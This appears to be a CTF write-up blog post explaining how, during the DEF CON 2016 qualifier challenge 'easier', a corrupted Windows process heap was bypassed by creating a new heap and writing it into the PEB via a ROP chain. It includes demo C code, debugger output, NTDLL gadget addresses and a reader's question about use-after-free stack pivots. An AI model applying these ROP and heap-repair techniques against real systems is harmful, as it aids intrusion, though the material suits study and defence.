
Windows user-mode exploitation trick – refreshing the main process heap

During the weekend of May 21-23 (directly after the CONFidence CTF that we organized with Dragon Sector), the qualifications for the famous DEF CON CTF 2016 took place. We obviously participated in what is probably the most binary-heavy, challenging and competitive CTF of the year, eventually ending up 9th on the final scoreboard, which was sufficient to qualify us for the main event. :-)

While the competition featured a great number of tasks to solve, including multiple pwnables in the CGC (Cyber Grand Challenge) formula, I must admit that I spent nearly the entire CTF working on a single challenge: a vulnerable Windows x86 executable called easier, authored by Thing2. After two full days of hacking by myself, and a few final hours of developing a ROP chain together with Gynvael, we managed to get the flag just in time, roughly 25 minutes before the end of the CTF. Overall, the problem had the second-fewest successful solves (it was completed by a total of 5 teams: PPP, DEFKOR, 9447, Samurai and Dragon Sector), and considering that it was available from the start of the contest (contrary to secrfrevenge), it was probably the most difficult challenge of all.

The source code of the task is available on LegitBS’ GitHub: here. If you are interested in reading a complete solution by the 9447 team (quite different from ours), check out the following article: Def Con Quals 2016 – Easier [Pwnable].

The CTF challenge

For some basic context, the task was a very small executable, with DEP and ASLR enabled, running on Windows Server 2012 (Amazon EC2) under AppJailLauncher. It used symmetric encryption with a static key for communication, and allowed the network client to perform 8 operations, all centered around a list of allocations on the heap. There were plenty of vulnerabilities, or at least code constructs which appeared as such, but turned out to be unusable in practice. This made me wonder if I was missing something, the author was trolling hard, or if they just didn’t sufficiently test the task. Now I know it wasn’t #1 (since other players had the same thoughts), but I still don’t know which of options #2 and #3 it is. :)

Of course, there were still primitives which eventually allowed us to achieve arbitrary code execution: we could allocate buffers of controlled size on the heap, free them multiple times (double-free), reuse them (use-after-free), and overread / overwrite them to a very controlled extent. On the other hand, there were still many significant obstacles to overcome:

  • The heap on the organizers’ server behaved in a very different way compared to my local environment. Even when testing on the exact same system with the same cloud provider (Windows Server 2012 on Amazon EC2), there were still vast inconsistencies in the allocation patterns (even though they were mostly consistent within the same machine). I spent a fair amount of time figuring out allocation sizes which would reproduce the same results both locally and remotely.
  • Even with control over the heap, and consequently an arbitrary read/write primitive, we would be limited to tampering with the heap and static data in executable images (with no access to, for example, the stack). This was still far from getting EIP control, as the task itself didn’t provide any means to hijack control flow (in the form of function pointers, vtables etc.). Instead, a generic technique had to be used. Dougall achieved it by locating a vtable pointer to std::locale::_Locimp on the heap on the remote server, and blindly finished the exploit from there. I also found the vtable pointer, but only in my local setup. In the end, I managed to discover and disclose a stack address from the heap memory and use it to write a ROP chain directly there. That is, however, a subject for another post. :)
  • As a side effect of my exploitation technique, the heap was always slightly corrupted when entering the ROP chain. Since the chain would contain API calls such as CreateFile, ReadFile or WriteFile, which internally operate on the heap as well, the process would just crash in the allocator before the flag could be sent back to me. This post describes how we addressed the problem during the CTF (props to Gynvael for suggesting the idea). I haven’t seen this modest technique described or used anywhere publicly, but if it has been, please let me know.

Overall, given how few options the task itself provided, it was necessary to invent universal, Windows-specific tricks to obtain the flag. I have personally learned a lot during this exercise, and will be sharing other techniques or considerations I came up with that weekend on this blog shortly. I’ll also release the full exploit code as soon as I clean it up a bit. :)

Corrupted default process heap

Let’s assume that the application we are exploiting operates solely on the default heap (returned by the GetProcessHeap API call), and in the process of getting code / ROP execution, its structures inevitably get corrupted. When we then try to call any high-level API to perform some meaningful operation in the system, chances are that the function will crash before returning, or even before calling into the kernel. This is illustrated in the code below, which allocates a buffer of 16 bytes, overflows it by an extra 24 bytes, and subsequently invokes the standard CreateFileA API:

#include <Windows.h>
#include <stdio.h>
#include <tchar.h>

int _tmain(int argc, _TCHAR* argv[]) {
  CHAR cBuffer[128] = { 0 };
  DWORD dwNumberOfBytesProcessed;

  LPVOID lpBuffer = HeapAlloc(GetProcessHeap(), 0, 16);
  RtlFillMemory(lpBuffer, 40, 'A');

  HANDLE hFile = CreateFileA("flag.txt", GENERIC_READ, 0, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
  ReadFile(hFile, cBuffer, 128, &dwNumberOfBytesProcessed, NULL);
  WriteFile(GetStdHandle(STD_OUTPUT_HANDLE), cBuffer, 128, &dwNumberOfBytesProcessed, NULL);
  
  return 0;
}

Starting the program will typically result in the following or similar crash:

Critical error detected c0000374
(1464.3d4c): Break instruction exception - code 80000003 (first chance)
eax=00000000 ebx=00000000 ecx=775736ab edx=0030f345 esi=00430000 edi=0048dca8
eip=775ce815 esp=0030f598 ebp=0030f610 iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000202
ntdll!RtlReportCriticalFailure+0x29:
775ce815 cc int 3

0:000> kb
ChildEBP RetAddr Args to Child 
0030f610 775cf749 c0000374 77604270 0030f654 ntdll!RtlReportCriticalFailure+0x29
0030f620 775cf829 00000002 0524b3ed 00430000 ntdll!RtlpReportHeapFailure+0x21
0030f654 775cfa92 00000003 00430000 0048dca8 ntdll!RtlpLogHeapFailure+0xa1
0030f6ac 7758ab23 00430000 0048dca8 00000000 ntdll!RtlpAnalyzeHeapFailure+0x25b
0030f790 77533431 00000012 00000020 004300c4 ntdll!RtlpAllocateHeap+0x62b
0030f814 7752e74c 00430000 00000000 00000012 ntdll!RtlAllocateHeap+0x23a
0030f828 7752f80e 00000012 0524bddd 00000000 ntdll!NtdllpAllocateStringRoutine+0x1b
0030f864 74f94961 0030f890 0030f878 00000001 ntdll!RtlAnsiStringToUnicodeString+0x52
0030f880 74f953a1 0030f890 00aafcec 00120010 kernel32!Basep8BitStringToDynamicUnicodeString+0x2b
0030f898 00aa1076 00aafcec 80000000 00000000 kernel32!CreateFileA+0x13
0030f944 00aa11e5 00000001 0048f9c0 0048f9f0 HeapCorrupt!wmain+0x76
0030f98c 74f9338a 7efde000 0030f9d8 77539902 HeapCorrupt!__tmainCRTStartup+0xfe
0030f998 77539902 7efde000 0524bc61 00000000 kernel32!BaseThreadInitThunk+0xe
0030f9d8 775398d5 00aa1262 7efde000 00000000 ntdll!__RtlUserThreadStart+0x70
0030f9f0 00000000 00aa1262 7efde000 00000000 ntdll!_RtlUserThreadStart+0x1b

In situations like this, it would be intuitive to try to fix up the heap by restoring the original bytes (not always possible, since they may be unknown or impossible to deduce), or inserting ones that would mimic valid heap structure and prevent the allocator from crashing. However, it should be noted that all internal API allocations are made from the default heap, whose base is stored in the PEB (Process Environment Block) structure:

.text:6B2C96E0 ; int __stdcall NtdllpAllocateStringRoutine(ULONG Size)
.text:6B2C96E0 _NtdllpAllocateStringRoutine@4 proc near
.text:6B2C96E0
.text:6B2C96E0
.text:6B2C96E0 Size            = dword ptr  8
.text:6B2C96E0
.text:6B2C96E0                 mov     edi, edi
.text:6B2C96E2                 push    ebp
.text:6B2C96E3                 mov     ebp, esp
.text:6B2C96E5                 push    [ebp+Size]      ; Size
.text:6B2C96E8                 mov     eax, large fs:30h
.text:6B2C96EE                 push    0               ; Flags
.text:6B2C96F0                 push    dword ptr [eax+18h] ; HeapHandle
.text:6B2C96F3                 call    _RtlAllocateHeap@12 ; RtlAllocateHeap(x,x,x)
.text:6B2C96F8                 pop     ebp
.text:6B2C96F9                 retn    4
.text:6B2C96F9 _NtdllpAllocateStringRoutine@4 endp

0:000> dt _TEB
ntdll!_TEB
   +0x000 NtTib            : _NT_TIB
   +0x01c EnvironmentPointer : Ptr32 Void
   +0x020 ClientId         : _CLIENT_ID
   +0x028 ActiveRpcHandle  : Ptr32 Void
   +0x02c ThreadLocalStoragePointer : Ptr32 Void
   +0x030 ProcessEnvironmentBlock : Ptr32 _PEB
...

0:000> dt _PEB
ntdll!_PEB
   +0x000 InheritedAddressSpace : UChar
   +0x001 ReadImageFileExecOptions : UChar
   +0x002 BeingDebugged    : UChar
   +0x003 BitField         : UChar
   +0x003 ImageUsesLargePages : Pos 0, 1 Bit
   +0x003 IsProtectedProcess : Pos 1, 1 Bit
   +0x003 IsLegacyProcess  : Pos 2, 1 Bit
   +0x003 IsImageDynamicallyRelocated : Pos 3, 1 Bit
   +0x003 SkipPatchingUser32Forwarders : Pos 4, 1 Bit
   +0x003 SpareBits        : Pos 5, 3 Bits
   +0x004 Mutant           : Ptr32 Void
   +0x008 ImageBaseAddress : Ptr32 Void
   +0x00c Ldr              : Ptr32 _PEB_LDR_DATA
   +0x010 ProcessParameters : Ptr32 _RTL_USER_PROCESS_PARAMETERS
   +0x014 SubSystemData    : Ptr32 Void
   +0x018 ProcessHeap      : Ptr32 Void
...

So, instead of desperately trying to fix what cannot be fixed (or can only be fixed unreliably), we can create a completely fresh heap and insert it into the PEB. Such a new heap can be created using either the high-level HeapCreate function (exported by kernel32.dll) or the low-level RtlCreateHeap (exported by ntdll.dll), both of which take only trivial arguments, mostly zeros. Likewise, the address of the PEB can be obtained by calling the undocumented ntdll!RtlGetCurrentPeb function:

.text:6B35CF60 ; _DWORD __stdcall RtlGetCurrentPeb()
.text:6B35CF60                 public _RtlGetCurrentPeb@0
.text:6B35CF60 _RtlGetCurrentPeb@0 proc near
.text:6B35CF60
.text:6B35CF60                 mov     eax, large fs:18h
.text:6B35CF66                 mov     eax, [eax+30h]
.text:6B35CF69                 retn
.text:6B35CF69 _RtlGetCurrentPeb@0 endp
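
To make the pointer chain from the listings above concrete, here is a toy Python model of it. It is only a sketch: the "memory" is a plain dictionary, and every address in it (TEB, PEB, both heaps) is invented for illustration. Only the offsets (0x18 and 0x30 in the TEB, 0x18 in the PEB) come from the disassembly and structure dumps above.

```python
# Toy 32-bit address space: maps an address to the DWORD stored there.
# All four addresses below are made up for the example.
TEB = 0x7EFDD000
PEB = 0x7EFDE000
OLD_HEAP = 0x00430000
NEW_HEAP = 0x02000000

memory = {
    TEB + 0x18: TEB,       # NT_TIB.Self, which is what fs:[18h] reads
    TEB + 0x30: PEB,       # TEB.ProcessEnvironmentBlock
    PEB + 0x18: OLD_HEAP,  # PEB.ProcessHeap
}


def rtl_get_current_peb():
    """Follow the same two loads as ntdll!RtlGetCurrentPeb."""
    teb = memory[TEB + 0x18]   # mov eax, large fs:18h
    return memory[teb + 0x30]  # mov eax, [eax+30h]


def process_heap():
    """The heap that NtdllpAllocateStringRoutine would allocate from."""
    return memory[rtl_get_current_peb() + 0x18]


def refresh_heap(new_heap):
    """The whole trick: overwrite PEB.ProcessHeap with a fresh heap."""
    memory[rtl_get_current_peb() + 0x18] = new_heap
```

In this model, calling refresh_heap(NEW_HEAP) makes every later process_heap() lookup return the new heap, which is the effect the single write into the PEB has on internal API allocations.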

In the case of the easier DEF CON challenge, we had already leaked the base address of NTDLL, meaning we knew the addresses of both necessary functions. It was then only a matter of finding the right gadgets to save the fresh heap into PEB, which turned out to be quite easy. Below is the part of Gynvael’s ROP chain responsible for the entire process:

def nt_RtlGetCurrentPeb():
  return ''.join([
      ntdd(0x6b35cf60)
  ])

def xchg_edi_eax():
  # 0x6b28c776    xchg edi, eax
  # 0x6b28c777    ret 0x0
  return ''.join([
      ntdd(0x6b28c776),
  ])

def nt_RtlCreateHeap():
  return ''.join([
      ntdd(0x6b2dc060),
      ntdd(0x6b28221f),  # ret to compensate for params
      dd(2),
      dd(0) * 5
  ])

def poke_edi_18_eax():
  # 0x6b358a6f    mov [edi+0x18], eax
  # 0x6b358a72    xor eax, eax
  # 0x6b358a74    pop edi
  # 0x6b358a75    pop esi
  # 0x6b358a76    ret
  return ''.join([
      ntdd(0x6b358a6f),
      dd(0), dd(0)
  ])

def fix_heap():
  return ''.join([
      nt_RtlGetCurrentPeb(),
      xchg_edi_eax(),
      nt_RtlCreateHeap(),
      poke_edi_18_eax(),
  ])
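
The dd and ntdd helpers are not shown in the excerpt above. A plausible reading is that dd packs a 32-bit little-endian value and ntdd first rebases a static NTDLL address onto the leaked base. The sketch below is written under that assumption: STATIC_NTDLL_BASE and leaked_ntdll_base are hypothetical values chosen for the example, not taken from the actual exploit, and the chain is flattened into one function with a comment on each stack slot.

```python
import struct

# Assumption: the base that the static addresses in the listings are
# relative to. Hypothetical, not stated in the post.
STATIC_NTDLL_BASE = 0x6B280000
# Placeholder for the NTDLL base leaked from the remote process.
leaked_ntdll_base = 0x77500000


def dd(value):
    """Pack a 32-bit little-endian DWORD."""
    return struct.pack("<I", value & 0xFFFFFFFF)


def ntdd(static_address):
    """Rebase a static NTDLL address onto the leaked base and pack it."""
    return dd(static_address - STATIC_NTDLL_BASE + leaked_ntdll_base)


def fix_heap():
    """Same stack layout as the chain above, one slot per line."""
    return b"".join([
        ntdd(0x6B35CF60),  # RtlGetCurrentPeb: eax = PEB
        ntdd(0x6B28C776),  # xchg edi, eax ; ret: edi = PEB
        ntdd(0x6B2DC060),  # RtlCreateHeap: eax = new heap
        ntdd(0x6B28221F),  # its return address, a bare ret
        dd(2),             # Flags = HEAP_GROWABLE
        dd(0) * 5,         # remaining five arguments, all zero
        ntdd(0x6B358A6F),  # mov [edi+0x18], eax ; ... ; pop edi ; pop esi ; ret
        dd(0), dd(0),      # fillers consumed by pop edi / pop esi
    ])
```

Since RtlCreateHeap removes its six arguments from the stack on return, execution continues at the bare ret and then at the final gadget, which stores the new heap handle at PEB+0x18. The whole fragment occupies 13 DWORDs (52 bytes).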

The same result can be reproduced with a slightly modified version of the previous program, which now creates a new heap, inserts it into the PEB, verifies that it is fully valid by calling HeapValidate, and then proceeds to read the “flag.txt” file and print out its contents:

#include <Windows.h>
#include <stdio.h>
#include <tchar.h>

extern "C" {
  PVOID WINAPI RtlGetCurrentPeb();
  PVOID WINAPI RtlCreateHeap(ULONG, PVOID, SIZE_T, SIZE_T, PVOID, PVOID);
}  // extern "C"

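VOID FixHeap() {
  // Create a brand new growable heap with default parameters.
  PVOID pNewHeap = RtlCreateHeap(HEAP_GROWABLE, NULL, 0, 0, NULL, NULL);
  // Store it in PEB.ProcessHeap (offset 0x18 in the 32-bit PEB shown above).
  ((PVOID *)RtlGetCurrentPeb())[0x18 / sizeof(PVOID)] = pNewHeap;
}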

int _tmain(int argc, _TCHAR* argv[]) {
  CHAR cBuffer[128] = { 0 };
  DWORD dwNumberOfBytesProcessed;

  LPVOID lpBuffer = HeapAlloc(GetProcessHeap(), 0, 16);
  RtlFillMemory(lpBuffer, 40, 'A');

  FixHeap();
  HeapValidate(GetProcessHeap(), 0, NULL);

  HANDLE hFile = CreateFileA("flag.txt", GENERIC_READ, 0, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
  ReadFile(hFile, cBuffer, 128, &dwNumberOfBytesProcessed, NULL);
  WriteFile(GetStdHandle(STD_OUTPUT_HANDLE), cBuffer, 128, &dwNumberOfBytesProcessed, NULL);
  
  return 0;
}

The new program now successfully prints out the flag:

c:\HeapCorrupt\Release>HeapCorrupt.exe
FLAG{Heap_Successfully_Recovered}

And that’s it! While the trick is trivial in principle, we were quite happy that we thought of it on the spot, with less than 40 minutes until the end of the competition, and the qualification to the grand DEF CON CTF finals at stake. Perhaps someone else will find it equally useful, too. :)

MSVCRT heap caching

If the target Windows application also happens to use standard library functions (such as printf, fopen etc.), it will depend on the Microsoft Visual C Run-Time Library (MSVCRT), either by importing from an external DLL, or by having the necessary functions linked statically. In either case, it may be useful to keep in mind that the library keeps its own copy of the pointer to the default process heap in static memory, in a variable called _crtheap. The pointer is only initialized once, in the _heap_init function, invoked in the default program prologue before main:

.text:0040301A ; int __cdecl _heap_init()
.text:0040301A __heap_init     proc near               ; CODE XREF: __tmainCRTStartup+5C
.text:0040301A                 call    ds:__imp__GetProcessHeap@0 ; GetProcessHeap()
.text:00403020                 xor     ecx, ecx
.text:00403022                 mov     __crtheap, eax
.text:00403027                 test    eax, eax
.text:00403029                 setnz   cl
.text:0040302C                 mov     eax, ecx
.text:0040302E                 retn
.text:0040302E __heap_init     endp

That pointer is then reused in the memory allocator (malloc, realloc, free), which is internally used by other standard, high-level functions, without any further references to GetProcessHeap. If your ROP chain or shellcode uses any functions from the standard library, you may need to overwrite this second pointer as well.
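
The consequence of this caching can be shown with a small Python toy model. It is a sketch only: the class, its attribute names and both heap addresses are invented for illustration and do not correspond to real Windows or CRT structures.

```python
class ToyProcess:
    """Toy model of the two heap pointers discussed above."""

    def __init__(self, default_heap):
        self.peb_process_heap = default_heap  # stands in for PEB.ProcessHeap
        self.crtheap = 0                      # stands in for MSVCRT's _crtheap

    def heap_init(self):
        # Mirrors _heap_init: read the process heap once and cache it.
        self.crtheap = self.peb_process_heap
        return self.crtheap != 0

    def get_process_heap(self):
        # The heap used by internal Windows API allocations.
        return self.peb_process_heap

    def malloc_heap(self):
        # The heap used by malloc / realloc / free.
        return self.crtheap


proc = ToyProcess(default_heap=0x00430000)
proc.heap_init()

# Replacing only the PEB pointer leaves the CRT on the old heap.
proc.peb_process_heap = 0x02000000
stale = proc.malloc_heap()

# A second write is needed to move the CRT allocator as well.
proc.crtheap = proc.peb_process_heap
```

After the first write, stale still holds the old heap address, which is why CRT functions would keep touching the corrupted heap until _crtheap is updated too.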

{ 1 } Comments

  1. hansraj rai | 28-Jul-17 at 08:28:54 | Permalink

    i know this is off topic but i didnt know how to contact you. Iam a big fan of yours and would love to learn from you and someday become an exploit dev pro in india. Ive been trying to create a rop chain for windows 8 but it seems like a really challenging task.

    They say that for a use after free i should create a string object of the size of the item freed, then put the address of a stack pivot instruction like xchg esp, eax etc.
    then put the arguments to virtualprotect to the saved stack pointer like
    mov [eax], edx; then decrement eax by 4. basically this is the method taught by
    dan rosenberg, but i dont know how to get the address of the heap (where my shellcode is) on the stack. Could you please help me understand this thing. May be you can point me in the right direction.

    Regards,
    Hansraj rai
